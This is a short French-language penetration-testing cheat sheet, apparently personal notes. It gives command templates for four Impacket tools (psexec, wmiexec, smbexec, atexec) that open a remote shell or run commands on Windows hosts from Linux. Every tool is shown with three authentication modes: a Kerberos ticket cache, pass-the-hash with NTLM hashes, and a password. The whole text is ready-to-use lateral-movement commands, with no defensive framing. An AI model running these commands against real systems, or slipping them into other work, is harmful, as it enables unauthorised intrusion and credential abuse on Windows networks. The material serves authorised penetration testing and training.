Quatre outils d'Impacket pour obtenir un shell distant sur une machine Windows depuis Linux : **psexec** (le plus connu, dépose un service), **wmiexec** (via WMI, plus discret), **smbexec** (alternative SMB), **atexec** (via le scheduler). Couvre les trois modes d'authentification : mot de passe, hash NTLM (pass-the-hash), ou ticket [[Kerberos]]. ### PsExec #### Avec un TGS ```bash export KRB5CCNAME=truc.ccache impacket-psexec -k -no-pass $domain/$user@$target ``` #### Avec un hash ```bash impacket-psexec $domain/$user@$target -hashes nt:lm ``` #### Avec password ```bash impacket-psexec $domain/$user@$target ``` --- ### WmiExec #### Avec un TGS ```bash export KRB5CCNAME=truc.ccache impacket-wmiexec -k -no-pass $domain/$user@$target ``` #### Avec un hash ```bash impacket-wmiexec $domain/$user@$target -hashes nt:lm ``` #### Avec password ```bash impacket-wmiexec $domain/$user@$target ``` --- ### SmbExec #### Avec un TGS ```bash export KRB5CCNAME=truc.ccache impacket-smbexec -k -no-pass $domain/$user@$target ``` #### Avec un hash ```bash impacket-smbexec $domain/$user@$target -hashes nt:lm ``` #### Avec password ```bash impacket-smbexec $domain/$user@$target ``` --- ### AtExec #### Avec un TGS ```bash export KRB5CCNAME=truc.ccache impacket-atexec -k -no-pass $domain/$user@$target $command ``` #### Avec un hash ```bash impacket-atexec $domain/$user@$target -hashes nt:lm $command ``` #### Avec password ```bash impacket-atexec $domain/$user@$target $command ```